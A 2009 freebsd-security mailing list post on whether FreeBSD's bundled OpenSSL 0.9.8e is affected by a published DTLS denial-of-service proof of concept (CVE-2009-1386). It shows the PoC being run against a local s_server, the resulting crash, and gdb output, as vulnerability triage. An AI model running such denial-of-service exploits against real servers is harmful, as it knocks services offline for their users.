OpenSSL DoS/PoC in milw0rm
Pieter de Boer
pieter at thedarkside.nl
Thu Jun 4 21:47:00 UTC 2009
Oliver Pinter wrote:
> the base system contins 0.9.8e and this PoC is affected up to 0.9.8i
> not yet tested
> the question is, the freebsd is affected for this error/malware/poc?
> http://milw0rm.com/exploits/8873
(term1)
OpenSSL> version
OpenSSL 0.9.8e 23 Feb 2007
% openssl s_server -cert /usr/src/crypto/openssl/apps/server.pem -accept
1234 -dtls1
...
(term2)
% ./cve-2009-1386 localhost 1234
[+] Sending DTLS datagram of death at localhost:1234...
...
(term1)
zsh: segmentation fault (core dumped) openssl s_server -cert
/usr/src/crypto/openssl/apps/server.pem -accept 1234
GDB shows:
Program received signal SIGSEGV, Segmentation fault.
0x480fe28d in ssl3_do_change_cipher_spec () from /usr/lib/libssl.so.5
...
0x480fe28d <ssl3_do_change_cipher_spec+189>: mov %eax,0xac(%edx)
...
(gdb) i r edx
edx 0x0 0
Looks vulnerable, but I had to force DTLS using the -dtls1 switch, so it
may not be much of an issue in most real world configurations?
--
Pieter
More information about the freebsd-security
mailing list